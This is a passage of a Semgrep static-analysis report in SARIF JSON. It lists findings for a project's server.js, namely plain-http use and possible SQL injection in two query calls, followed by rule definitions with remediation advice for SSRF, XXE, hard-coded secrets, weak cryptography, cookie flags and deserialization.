{"},"startColumn":16,"startLine":32}}}],"message":{"text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"properties":{},"ruleId":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server"},{"fingerprints":{"matchBasedId/v1":"6e68a44da5cfe9dc6b1f525d7a48bd150c4f09dcfb39816797f31c0b1e35ca0a4c86a26880c59b0e7729587e4f058f4e9b5b52b28fb7751cbfcd22d5b4639341_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"server.js","uriBaseId":"%SRCROOT%"},"region":{"endColumn":35,"endLine":79,"snippet":{"text":" connection.query(query, (err, rows) => {"},"startColumn":30,"startLine":79}}}],"message":{"text":"Detected a `mysql2` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"properties":{},"ruleId":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli"},{"fingerprints":{"matchBasedId/v1":"18d72533707db0d688bb04b88d63e9bb36e18196d38bfaf2af511e90fb008f6787090be90e4a0343c986b4b27b05862dc206b442289fe482d669b737652a4f33_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"server.js","uriBaseId":"%SRCROOT%"},"region":{"endColumn":59,"endLine":113,"snippet":{"text":" const result = await sequelize.query(query, { type: sequelize.QueryTypes.SELECT });"},"startColumn":54,"startLine":113}}}],"message":{"text":"Detected a `mysql2` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"properties":{},"ruleId":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli"}],"tool":{"driver":{"name":"Semgrep OSS","rules":[{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","id":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","name":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"help":{"markdown":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf","id":"csharp.lang.security.ssrf.web-request.ssrf","name":"csharp.lang.security.ssrf.web-request.ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.ssrf.web-request.ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","id":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","name":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"help":{"markdown":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n","text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","id":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","name":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"help":{"markdown":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth)\n - [https://cwe.mitre.org/data/definitions/477.html](https://cwe.mitre.org/data/definitions/477.html)\n","text":"Warning MONGODB-CR was deprecated with the release of MongoDB 3.6 and is no longer supported by MongoDB 4.0 (see https://api.mongodb.com/python/current/examples/authentication.html for details)."},"helpUri":"https://semgrep.dev/r/python.pymongo.security.mongodb.mongo-client-bad-auth","id":"python.pymongo.security.mongodb.mongo-client-bad-auth","name":"python.pymongo.security.mongodb.mongo-client-bad-auth","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymongo.security.mongodb.mongo-client-bad-auth"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"External XML Schema is allowed for identified XML parser. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks via XML Schema (`.xsd` files). It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","id":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","name":"java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.schemafactory-xxe-schema.schemafactory-xxe-schema"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/www-community/HttpOnly](https://owasp.org/www-community/HttpOnly)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"help":{"markdown":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)\n - [https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57Pt3r1.pdf)\n","text":"Detected an insufficient key size for RSA. NIST recommends a key size of 2048 or higher."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","id":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","name":"python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insufficient-rsa-key-size.insufficient-rsa-key-size"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command)\n - [http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command](http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py](https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","id":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","name":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"help":{"markdown":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)\n - [https://www.youtube.com/watch?v=CIhHpkybYsY](https://www.youtube.com/watch?v=CIhHpkybYsY)\n - [https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf](https://github.com/orangetw/My-Presentation-Slides/blob/main/data/2018-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out.pdf)\n","text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal","id":"generic.nginx.security.alias-path-traversal.alias-path-traversal","name":"generic.nginx.security.alias-path-traversal.alias-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.alias-path-traversal.alias-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"help":{"markdown":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text)\n - [https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss](https://brakemanpro.com/2017/09/08/cross-site-scripting-in-rails#inline-renders---even-worse-than-xss)\n","text":"'render text: ...' actually sets the content-type to 'text/html'. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Instead, use 'render plain: ...' to render non-HTML text."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","id":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","name":"ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-text.avoid-render-text"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","id":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","name":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.knex-express.knex-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.knex-express.knex-express","id":"javascript.express.db.knex-express.knex-express","name":"javascript.express.db.knex-express.knex-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.knex-express.knex-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"help":{"markdown":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor)\n - [https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption](https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption)\n","text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","id":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","name":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the 